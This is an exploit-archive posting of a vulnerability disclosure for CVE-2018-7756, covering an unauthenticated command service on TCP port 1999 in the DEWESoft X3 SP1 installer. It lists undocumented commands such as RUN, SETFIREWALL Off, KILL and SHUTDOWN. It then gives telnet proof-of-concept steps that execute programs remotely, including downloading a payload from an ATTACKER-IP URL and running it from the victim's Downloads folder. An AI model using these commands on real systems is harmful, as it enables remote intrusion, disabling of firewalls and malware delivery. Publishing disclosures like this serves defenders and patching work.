Exploit for windows platform in category remote exploits
[+] Credits: John Page (aka hyp3rlinx)
Vendor:
=============
www.dewesoft.com
Product:
===========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe
Vulnerability Type:
===================
Remote Internal Command Access
CVE Reference:
==============
CVE-2018-7756
Security Issue:
================
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run
a "SETFIREWALL Off" command.
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
RUN <ANY EXE>
RUNEX <ANY EXE>
GETFIREWALL
SETFIREWALL Off
KILL <PROCESS>
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE
Exploit/POC:
=============
TELNET x.x.x.x 1999
RUN calc.exe
OR
Launch the victims browser and send them to website for a drive-by download etc.
TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe
Then from the TELNET session execute it from Downloads directory.
runexe c:\Users\victim\Downloads\DOOM.exe
# 0day.today [2018-04-02] #